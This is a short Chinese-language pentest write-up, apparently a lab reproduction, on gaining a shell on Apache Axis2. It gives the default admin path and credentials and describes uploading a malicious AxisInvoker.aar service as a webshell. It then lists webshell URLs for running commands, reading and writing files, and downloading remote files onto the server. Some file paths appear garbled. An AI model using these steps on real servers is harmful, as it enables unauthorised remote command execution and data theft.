0x00 前言
Apache Axis2是一个Web服务的核心支援引擎。AXIS2对旧有的AXIS重新设计及重写,并提供两种语言Java及C的开发版本。
事实上AXIS2 不只为WEB应用程序提供Web服务的界面,而且它也可以作为一个单独的服务器看待,而且很简单就能跟Apache Tomcat整合,目前AXIS2的最新版本是1.6.2。
Axis是一个开源、基于XML的Web服务架构。最开始由IBM公司研发,叫IBM-SOAP。后来由Apache基金会在SOAP的基础上推出了AXIS。AXIS本质是一个Java语言编写的SOAP引擎。利用它我们可以在各种分布式应用中,让各个应用能够彼此操作、交互。
0x01 漏洞复现
默认端口:8089
默认后台路径:/axis2-admin/login
默认账号密码:admin/axis2
选择Tools-“ Upload Service ”上传aar包 进行 getshell
成功后会提示“ File AxisInvoker.aar successfully uploaded ”
0x02 使用方法
马子的使用方法:
支持的命令:
exec-运行命令,在Linux / Windows上均可使用,不用担心。
http://192.168.56.103:8080/axis2/services/AxisInvoker/exec?cmd=whoami
写-写文件
http://192.168.56.103:8080/axis2/services/AxisInvoker/write?path=c:1.1txt&content=123
info-显示某些信息,根据需要进行修改
http://192.168.56.103:8080/axis2/services/AxisInvoker/info
读取-读取文件内容
http://192.168.56.103:8080/axis2/services/AxisInvoker/read?path=c:oot.ini
下载-下载文件并将其保存在某处
http://192.168.56.103:8080/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:122.txt